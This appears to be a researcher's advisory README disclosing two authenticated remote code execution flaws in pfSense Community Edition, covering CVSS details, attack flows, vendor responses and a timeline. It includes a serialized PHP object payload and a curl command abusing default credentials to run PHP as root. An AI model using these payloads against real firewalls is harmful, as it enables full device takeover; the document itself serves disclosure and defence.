# 🔐 CVE-2025-69690 & CVE-2025-69691

> **Authenticated Remote Code Execution in Netgate pfSense Community Edition**

![CVE](https://img.shields.io/badge/CVE-2025--69690-red?style=flat-square)
![CVE](https://img.shields.io/badge/CVE-2025--69691-critical?style=flat-square&color=darkred)
![CVSS](https://img.shields.io/badge/CVSS-8.8%20%7C%209.9-orange?style=flat-square)
![Vendor](https://img.shields.io/badge/Vendor-Netgate-blue?style=flat-square)
![Status](https://img.shields.io/badge/Patch-None-red?style=flat-square)

---

## 📋 Summary

| Field | Details |
|-------|---------|
| **Researcher** | Nelson Adhepeau ([@privlabs](https://github.com/privlabs)) |
| **Vendor** | Netgate |
| **Product** | pfSense Community Edition |
| **Versions** | 2.7.2 and 2.8.0 |
| **Type** | Authenticated Remote Code Execution |
| **Disclosure** | February 2026 |
| **Vendor notified** | December 2, 2025 |
| **CVE assigned** | January 28, 2026 |

---

## ⚠️ Disclaimer

> This research was conducted in **isolated lab environments** for educational
> and security awareness purposes only. All findings were responsibly disclosed
> to the vendor prior to publication. This advisory does **not** constitute an
> invitation to attack production systems. Unauthorized testing is illegal.

---

## 🎯 CVE-2025-69690
### Unsafe Deserialization → RCE (pfSense CE 2.7.2)

| Field | Value |
|-------|-------|
| **CVSS v3.1** | **8.8 (High)** |
| **Vector** | `AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` |
| **CWE** | CWE-502, CWE-915 |
| **Attack Type** | Authenticated (Admin) |
| **Component** | Backup/Restore mechanism |

### Description

The pfSense configuration restore mechanism invokes `unserialize()` on
user-controlled data **without class whitelisting, input validation, or
sandboxing**.

A crafted backup file containing a malicious serialized PHP object injects
arbitrary commands via the `post_reboot_commands` property, which are
executed through `mwexec()` with **full root privileges**.

### Attack Flow

```
[Attacker] → Login as admin
           → Upload malicious .xml backup file
           → Trigger restore
           → pfSense calls unserialize() on attacker data
           → post_reboot_commands executed via mwexec()
           → [ROOT SHELL]
```

### Affected Components

- `config.php` — restore processing logic
- `pfsense_module_installer` class — unsafe deserialization target
- `mwexec()` — command execution sink

### PoC Payload

```php
O:23:"pfsense_module_installer":1:{
  s:17:"*post_reboot_commands";
  a:1:{
    i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";
  }
}
```

### Impact

- ✅ Arbitrary OS command execution as root
- ✅ Persistent backdoor installation
- ✅ Complete firewall takeover
- ✅ Credential and configuration exfiltration

### Vendor Response

> *"Acknowledged. Classified as authenticated administrative abuse.
> No patch will be issued."* — Netgate

---

## 🎯 CVE-2025-69691
### XMLRPC exec_php → RCE (pfSense CE 2.8.0)

| Field | Value |
|-------|-------|
| **CVSS v3.1** | **9.9 (Critical)** |
| **Vector** | `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` |
| **CWE** | CWE-284, CWE-915 |
| **Attack Type** | Authenticated (remote, Basic Auth) |
| **Component** | XMLRPC API — `pfsense.exec_php` |

### Description

pfSense CE 2.8.0 exposes an XMLRPC method `pfsense.exec_php` that
**executes arbitrary PHP code as root** without validation, sandboxing,
or any form of restriction.

The endpoint is:
- ✅ Enabled **by default**
- ✅ Accessible remotely over **HTTPS**
- ✅ Protected only by **Basic Authentication**
- ✅ Exploitable with **default credentials** (`admin:pfsense`)

### Attack Flow

```
[Attacker] → Send XMLRPC request to /xmlrpc.php
           → Authenticate with admin:pfsense (default)
           → Call pfsense.exec_php with arbitrary PHP
           → Code executes as root, no sandboxing
           → [ROOT SHELL]
```

### Affected Components

- `xmlrpc.php` — API entry point
- `pfsense.exec_php` — unsafe dynamic code execution
- BasicAuth layer — insufficient access control

### PoC

```bash
curl -k -u admin:pfsense \
  -H "Content-Type: text/xml" \
  -d '<methodCall>
        <methodName>pfsense.exec_php</methodName>
        <params>
          <param>
            <value><string>system("id");</string></value>
          </param>
        </params>
      </methodCall>' \
  https://<target>/xmlrpc.php
```

### Impact

- ✅ Full remote root compromise
- ✅ Arbitrary file read/write
- ✅ Backdoor deployment
- ✅ Firewall rule manipulation
- ✅ Extraction of all credentials and configurations

### Vendor Response

> *"Acknowledged. Classified as expected behavior for authenticated
> users. No patch planned."* — Netgate

---

## 📅 Timeline

```
November 2025     →  Vulnerabilities discovered
December 2, 2025  →  Responsible disclosure to Netgate
                  →  Vendor acknowledged, no patch planned
January 28, 2026  →  CVE IDs assigned by MITRE
February 2026     →  Public disclosure
```

---

## 🔗 References

- 🔴 [CVE-2025-69690 on cve.org](https://cve.org/CVERecord?id=CVE-2025-69690)
- 🔴 [CVE-2025-69691 on cve.org](https://cve.org/CVERecord?id=CVE-2025-69691)
- 📧 Full disclosure: `fulldisclosure@seclists.org`

---

## 👤 Researcher

**Nelson Adhepeau** — Independent Security Researcher

[![LinkedIn](https://img.shields.io/badge/LinkedIn-nelson--adhepeau-blue?style=flat-square&logo=linkedin)](https://linkedin.com/in/nelson-adhepeau)
[![GitHub](https://img.shields.io/badge/GitHub-privlabs-black?style=flat-square&logo=github)](https://github.com/privlabs)

📧 privexploits@protonmail.com

